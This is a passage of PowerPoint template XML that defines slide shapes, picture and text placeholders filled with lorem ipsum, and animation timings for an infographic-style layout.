                <a:lnTo>
                  <a:pt x="51122" y="293574"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170783" y="116452"/>
                  <a:pt x="373427" y="0"/>
                  <a:pt x="603269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53" name="Arc 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6642996" y="4121684"/>
            <a:ext cx="2112000" cy="1900798"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 11622373"/>
              <a:gd name="adj2" fmla="val 10303517"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="127000" cap="sq" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:bevel/>
            <a:headEnd type="none"/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384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4" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="78" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026928" y="4400542"/>
            <a:ext cx="2549123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920" b="1" baseline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Name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="79" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9026928" y="4842106"/>
            <a:ext cx="2549123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156" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="80" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9020585" y="5142447"/>
            <a:ext cx="2549123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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Oval 156"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6246296" y="4703357"/>
            <a:ext cx="816001" cy="734399"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5"/>
          </a:solidFill>
          <a:ln w="381000" cap="rnd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384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8" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="77" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324792" y="4703357"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="76"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900834" y="4263380"/>
            <a:ext cx="1692180" cy="1598076"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269135" h="1331730">
                <a:moveTo>
                  <a:pt x="603269" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="971017" y="0"/>
                  <a:pt x="1269135" y="298118"/>
                  <a:pt x="1269135" y="665865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1269135" y="1033612"/>
                  <a:pt x="971017" y="1331730"/>
                  <a:pt x="603269" y="1331730"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="373427" y="1331730"/>
                  <a:pt x="170783" y="1215278"/>
                  <a:pt x="51122" y="1038157"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10130" y="962634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39648" y="946612"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="125833" y="888387"/>
                  <a:pt x="182497" y="789784"/>
                  <a:pt x="182497" y="677946"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182497" y="566109"/>
                  <a:pt x="125833" y="467505"/>
                  <a:pt x="39648" y="409280"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="387760"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51122" y="293574"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="170783" y="116452"/>
                  <a:pt x="373427" y="0"/>
                  <a:pt x="603269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400"/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400" fill="hold"/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400" fill="hold"/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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="5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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="56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8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4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="60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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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4500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="7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0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="8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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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5500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="91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93"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6500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="95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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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1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1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1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7000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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7500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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8000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="126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8" dur="1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9000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="130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400"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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8" dur="400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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400" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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3" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1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9500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="14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1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10000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15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7" dur="300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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300" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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9" dur="300"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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10500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="161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3" dur="1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11500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="165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6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7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0" grpId="0" animBg="1"/>
      <p:bldP spid="94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94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9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9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5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9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6" grpId="0" animBg="1"/>
      <p:bldP spid="110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1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1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4" grpId="0"/>
      <p:bldP spid="118" grpId="0" animBg="1"/>
      <p:bldP spid="12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21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2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2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0" grpId="0" animBg="1"/>
      <p:bldP spid="133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3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3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6" grpId="0"/>
      <p:bldP spid="139" grpId="0" animBg="1"/>
      <p:bldP spid="14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41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4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4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2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2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4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4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7" grpId="0" animBg="1"/>
      <p:bldP spid="149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4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4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4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1" grpId="0"/>
      <p:bldP spid="153" grpId="0" animBg="1"/>
      <p:bldP spid="154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54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5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5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5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5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5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7" grpId="0" animBg="1"/>
      <p:bldP spid="158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9" grpId="0"/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ic lis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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text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03251" y="827103"/>
            <a:ext cx="10972800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3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="4732394"/>
            <a:ext cx="869949" cy="1730087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39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684392" y="4778114"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26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1608669" y="5317373"/>
            <a:ext cx="2500489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6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27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1608669" y="5682508"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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55" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1608669" y="4736932"/>
            <a:ext cx="2500489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ln>
                  <a:solidFill>
                    <a:schemeClr val="accent2"/>
                  </a:solidFill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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rounded Rectangle 19"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 21"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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8" name="Rounded Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4351162" y="4732394"/>
            <a:ext cx="869949" cy="1730087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Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="56" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4432303" y="4778114"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="57" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="5317373"/>
            <a:ext cx="2500489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6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41" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="58" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="5682508"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="59" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5356580" y="4736932"/>
            <a:ext cx="2500489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ln>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="accent2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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070147" y="4732391"/>
            <a:ext cx="869949" cy="1730088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4" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="60" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8151288" y="4778114"/>
            <a:ext cx="704141" cy="67451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 smtClean="0"/>
              <a:t>icon</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="61" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="5317373"/>
            <a:ext cx="2500489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6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46" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="62" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="5682508"/>
            <a:ext cx="2500489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30000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="108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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="63" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075565" y="4736932"/>
            <a:ext cx="2500489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ln>
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                </a:ln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smtClean="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Oval 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996835" y="1583962"/>
            <a:ext cx="2880004" cy="2592000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd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384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Oval 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4654434" y="1583962"/>
            <a:ext cx="2880004" cy="2592000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd" cmpd="sng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384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Oval 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8334611" y="1583962"/>
            <a:ext cx="2880004" cy="2592000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="381000" cap="rnd" cmpd="sng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384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Oval 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3873621" y="2565575"/>
            <a:ext cx="816001" cy="734399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381000" cap="rnd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384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Oval 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7514989" y="2565575"/>
            <a:ext cx="816001" cy="734399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381000" cap="rnd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384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1" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="874187" y="1483364"/>
            <a:ext cx="3072984" cy="2808000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2304738" h="2340000">
                <a:moveTo>
                  <a:pt x="1170000" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1695016" y="0"/>
                  <a:pt x="2139264" y="345807"/>
                  <a:pt x="2287399" y="822078"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2304738" y="889510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2267755" y="920023"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2193748" y="994029"/>
                  <a:pt x="2147974" y="1096269"/>
                  <a:pt x="2147974" y="1209199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2147974" y="1322130"/>
                  <a:pt x="2193748" y="1424369"/>
                  <a:pt x="2267755" y="1498375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2288108" y="1515168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2287399" y="1517922"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2139264" y="1994193"/>
                  <a:pt x="1695016" y="2340000"/>
                  <a:pt x="1170000" y="2340000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="523827" y="2340000"/>
                  <a:pt x="0" y="1816174"/>
                  <a:pt x="0" y="1170000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="523827"/>
                  <a:pt x="523827" y="0"/>
                  <a:pt x="1170000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52" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585804" y="1483364"/>
            <a:ext cx="3016120" cy="2808000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2262090" h="2340000">
                <a:moveTo>
                  <a:pt x="1129482" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1654499" y="0"/>
                  <a:pt x="2098746" y="345808"/>
                  <a:pt x="2246881" y="822078"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2262090" y="881226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2215068" y="920023"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2141061" y="994029"/>
                  <a:pt x="2095287" y="1096269"/>
                  <a:pt x="2095287" y="1209199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2095287" y="1322130"/>
                  <a:pt x="2141061" y="1424369"/>
                  <a:pt x="2215068" y="1498375"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2244998" y="1523069"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2207538" y="1625417"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2029922" y="2045348"/>
                  <a:pt x="1614113" y="2340000"/>
                  <a:pt x="1129482" y="2340000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="644852" y="2340000"/>
                  <a:pt x="229042" y="2045348"/>
                  <a:pt x="51426" y="1625417"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18258" y="1534793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62396" y="1498376"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="136403" y="1424369"/>
                  <a:pt x="182177" y="1322130"/>
                  <a:pt x="182177" y="1209199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="182177" y="1068036"/>
                  <a:pt x="110655" y="943578"/>
                  <a:pt x="1871" y="870085"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="869070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12083" y="822078"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="160218" y="345807"/>
                  <a:pt x="604466" y="0"/>
                  <a:pt x="1129482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53" name="Picture Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="64"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8254106" y="1483364"/>
            <a:ext cx="3071508" cy="2808000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2303631" h="2340000">
                <a:moveTo>
                  <a:pt x="1133631" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="1779805" y="0"/>
                  <a:pt x="2303631" y="523827"/>
                  <a:pt x="2303631" y="1170000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2303631" y="1816174"/>
                  <a:pt x="1779805" y="2340000"/>
                  <a:pt x="1133631" y="2340000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="649001" y="2340000"/>
                  <a:pt x="233191" y="2045348"/>
                  <a:pt x="55576" y="1625417"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16760" y="1519365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42199" y="1498376"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116206" y="1424369"/>
                  <a:pt x="161980" y="1322130"/>
                  <a:pt x="161980" y="1209199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="161980" y="1096269"/>
                  <a:pt x="116206" y="994029"/>
                  <a:pt x="42199" y="920023"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="885206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16232" y="822078"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="164367" y="345807"/>
                  <a:pt x="608615" y="0"/>
